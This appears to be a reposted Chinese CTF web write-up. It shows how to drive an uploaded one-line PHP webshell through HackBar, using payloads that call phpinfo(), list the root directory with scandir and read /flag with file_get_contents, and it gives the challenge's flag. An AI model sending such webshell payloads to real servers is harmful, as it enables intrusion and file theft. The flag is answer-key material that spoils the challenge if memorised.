一句话马,不用蚁剑连接通过hack_bar连接

Posted 鸡肋是鸡肋

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了一句话马,不用蚁剑连接通过hack_bar连接相关的知识,希望对你有一定的参考价值。

ctf中web的一道题

1、进行一句话马上传成功之后

f12打开hack_bar

\'一句话马,不用蚁剑连接、通过hack_bar连接_ctf\'


cmd(一句话马所传入设置的密码)=phpinfo(); 查看被禁用掉的函数

看了下被禁用的函数,发现还是可以进行目标浏览和文件读取

2、查找根目录,利用var_dump()打印、scandir()查找函数

cmd=var_dump(scandir(\'/\'));

\'一句话马,不用蚁剑连接、通过hack_bar连接_ctf_02\'

发现根目录下存在flag

3、读取目标文件下、并打印出来file_get_contents();获取目标文件

cmd=var_dump(file_get_contents(\'/flag\'));

\'一句话马,不用蚁剑连接、通过hack_bar连接_ctf_03\'

得到flag:flag{3252054f-bd05-453a-acc8-a252b4eaaee6}


以上是关于一句话马,不用蚁剑连接通过hack_bar连接的主要内容,如果未能解决你的问题,请参考以下文章

应急响应——Web响应思路

墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

实验:复现PHP一句话木马的利用

墨者靶场 内部文件上传系统漏洞分析溯源

墨者靶场 内部文件上传系统漏洞分析溯源